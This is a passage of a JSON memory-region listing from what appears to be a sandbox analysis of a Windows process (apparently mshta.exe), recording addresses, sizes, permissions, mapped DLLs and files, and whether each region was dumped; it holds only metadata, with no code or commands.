"readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 8749055, "entry_point": 0, "filename": null, "id": "region_1227", "name": "pagefile_0x00000000006d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7143424, "timestamp": "00:01:07.308", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1229", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:07.309", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1230", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:07.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8781824, "type": "region", "version": 1 }, "end_va": 10358783, "entry_point": 0, "filename": null, "id": "region_1231", "name": "pagefile_0x0000000000860000", 
"norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8781824, "timestamp": "00:01:07.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 10420224, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_1232", "name": "pagefile_0x00000000009f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 10420224, "timestamp": "00:01:07.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_1233", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:07.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 794623, "entry_point": 0, "filename": null, "id": "region_1234", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:07.314", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], 
"ref_process_dump": null, "size": 4096, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 856063, "entry_point": 851968, "filename": "\\Windows\\System32\\en-US\\mshta.exe.mui", "id": "region_1235", "name": "mshta.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\mshta.exe.mui", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:01:07.314", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001236-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_182", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_1236", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:01:07.318", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001237-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_183", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_1237", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:01:07.319", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 
8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1238", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:07.329", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1048576, "type": "region", "version": 1 }, "end_va": 1052671, "entry_point": 0, "filename": null, "id": "region_1240", "name": "pagefile_0x0000000000100000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1048576, "timestamp": "00:01:07.353", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32964608, "type": "region", "version": 1 }, "end_va": 34013183, "entry_point": 0, "filename": null, "id": "region_1241", "name": "private_0x0000000001f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 32964608, "timestamp": "00:01:07.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001242-addr_0x000007fffffdc000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_184", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": 
null, "id": "region_1242", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:07.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001243-addr_0x0000000000210000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_185", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_1243", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:07.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 512000, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3919871, "entry_point": 3460808, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_1244", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 3407872, "timestamp": "00:01:07.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1246", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": 
"00:01:07.367", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001247-addr_0x0000000002070000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_186", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 34013184, "type": "region", "version": 1 }, "end_va": 36110335, "entry_point": 0, "filename": null, "id": "region_1247", "name": "private_0x0000000002070000", "norm_filename": null, "region_type": "private_memory", "start_va": 34013184, "timestamp": "00:01:07.369", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 31391744, "type": "region", "version": 1 }, "end_va": 32305151, "entry_point": 0, "filename": null, "id": "region_1252", "name": "pagefile_0x0000000001df0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31391744, "timestamp": "00:01:07.410", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791715741696, "type": "region", "version": 1 }, "end_va": 8791715839999, "entry_point": 8791715746096, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_1253", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791715741696, "timestamp": "00:01:07.414", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is 
not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 36110336, "type": "region", "version": 1 }, "end_va": 39055359, "entry_point": 36110336, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1254", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 36110336, "timestamp": "00:01:07.419", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1255", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:07.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1256", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:07.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 39059456, "type": "region", 
"version": 1 }, "end_va": 42479615, "entry_point": 0, "filename": null, "id": "region_1257", "name": "pagefile_0x0000000002540000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 39059456, "timestamp": "00:01:07.425", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791754080256, "type": "region", "version": 1 }, "end_va": 8791754231807, "entry_point": 8791754118744, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1258", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791754080256, "timestamp": "00:01:07.426", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1259", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:07.429", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_1260", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 
2228224, "timestamp": "00:01:07.432", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1261", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:07.434", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 49152, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2342911, "entry_point": 2293760, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat", "id": "region_1262", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 2293760, "timestamp": "00:01:07.443", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3440639, "entry_point": 3407872, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat", "id": "region_1263", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat", "region_type": "memory_mapped_file", "start_va": 
3407872, "timestamp": "00:01:07.444", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 3473408, "filename": "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat", "id": "region_1264", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat", "region_type": "memory_mapped_file", "start_va": 3473408, "timestamp": "00:01:07.445", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 3538944, "filename": "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat", "id": "region_1265", "name": "index.dat", "norm_filename": "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat", "region_type": "memory_mapped_file", "start_va": 3538944, "timestamp": "00:01:07.447", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3805183, "entry_point": 0, "filename": null, "id": "region_1266", "name": "pagefile_0x00000000003a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3801088, "timestamp": "00:01:07.457", "type": "region", "version": 1 }, { 
"dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1281", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:07.511", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3870719, "entry_point": 0, "filename": null, "id": "region_1282", "name": "pagefile_0x00000000003b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3866624, "timestamp": "00:01:07.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 3932160, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1283", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 3932160, "timestamp": "00:01:07.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3997696, "type": 
"region", "version": 1 }, "end_va": 4005887, "entry_point": 0, "filename": null, "id": "region_1284", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:01:07.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_1285", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:07.523", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4071423, "entry_point": 0, "filename": null, "id": "region_1287", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:07.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 0, 
"filename": null, "id": "region_1288", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:07.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4136959, "entry_point": 0, "filename": null, "id": "region_1289", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:01:07.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 315392, "start_va": 8791770726400, "type": "region", "version": 1 }, "end_va": 8791771041791, "entry_point": 8791770730608, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1290", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 8791770726400, "timestamp": "00:01:07.606", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791791501312, "type": "region", "version": 1 }, "end_va": 8791791534079, "entry_point": 8791791506692, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1291", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 8791791501312, "timestamp": "00:01:07.607", "type": "region", "version": 1 }, { "dump": { 
"filename": "process_00000007-region_00001292-addr_0x0000000002890000-size_0x00000000001f0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_191", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2031616, "start_va": 42532864, "type": "region", "version": 1 }, "end_va": 44564479, "entry_point": 0, "filename": null, "id": "region_1292", "name": "private_0x0000000002890000", "norm_filename": null, "region_type": "private_memory", "start_va": 42532864, "timestamp": "00:01:07.609", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 372736, "start_va": 8791746019328, "type": "region", "version": 1 }, "end_va": 8791746392063, "entry_point": 8791746046272, "filename": "\\Windows\\System32\\dnsapi.dll", "id": "region_1293", "name": "dnsapi.dll", "norm_filename": "c:\\windows\\system32\\dnsapi.dll", "region_type": "memory_mapped_file", "start_va": 8791746019328, "timestamp": "00:01:07.613", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001294-addr_0x0000000002a80000-size_0x0000000000240000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_192", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2359296, "start_va": 44564480, "type": "region", "version": 1 }, "end_va": 46923775, "entry_point": 0, "filename": null, "id": "region_1294", "name": "private_0x0000000002a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 44564480, "timestamp": "00:01:07.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ 
"unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 8791728717824, "type": "region", "version": 1 }, "end_va": 8791728877567, "entry_point": 8791728756924, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_1295", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 8791728717824, "timestamp": "00:01:07.618", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791728652288, "type": "region", "version": 1 }, "end_va": 8791728697343, "entry_point": 8791728656792, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_1296", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 8791728652288, "timestamp": "00:01:07.619", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 42598400, "type": "region", "version": 1 }, "end_va": 43646975, "entry_point": 0, "filename": null, "id": "region_1297", "name": "private_0x00000000028a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42598400, "timestamp": "00:01:07.622", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001298-addr_0x0000000002a00000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", 
"permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_193", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 44040192, "type": "region", "version": 1 }, "end_va": 44564479, "entry_point": 0, "filename": null, "id": "region_1298", "name": "private_0x0000000002a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 44040192, "timestamp": "00:01:07.623", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001299-addr_0x000007fffffda000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_194", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092866560, "type": "region", "version": 1 }, "end_va": 8796092874751, "entry_point": 0, "filename": null, "id": "region_1299", "name": "private_0x000007fffffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092866560, "timestamp": "00:01:07.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 401408, "start_va": 8791581523968, "type": "region", "version": 1 }, "end_va": 8791581925375, "entry_point": 8791581528472, "filename": "\\Windows\\System32\\rasapi32.dll", "id": "region_1300", "name": "rasapi32.dll", "norm_filename": "c:\\windows\\system32\\rasapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791581523968, "timestamp": "00:01:07.623", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 114688, "start_va": 8791581392896, "type": "region", "version": 1 }, "end_va": 8791581507583, "entry_point": 8791581397408, "filename": "\\Windows\\System32\\rasman.dll", "id": "region_1301", "name": "rasman.dll", "norm_filename": "c:\\windows\\system32\\rasman.dll", "region_type": "memory_mapped_file", "start_va": 8791581392896, "timestamp": "00:01:07.625", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791711809536, "type": "region", "version": 1 }, "end_va": 8791711879167, "entry_point": 8791711814848, "filename": "\\Windows\\System32\\rtutils.dll", "id": "region_1302", "name": "rtutils.dll", "norm_filename": "c:\\windows\\system32\\rtutils.dll", "region_type": "memory_mapped_file", "start_va": 8791711809536, "timestamp": "00:01:07.627", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 34144256, "type": "region", "version": 1 }, "end_va": 35192831, "entry_point": 0, "filename": null, "id": "region_1327", "name": "private_0x0000000002090000", "norm_filename": null, "region_type": "private_memory", "start_va": 34144256, "timestamp": "00:01:07.665", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001328-addr_0x00000000021f0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_204", "ref_source": "summary", "ref_type": 
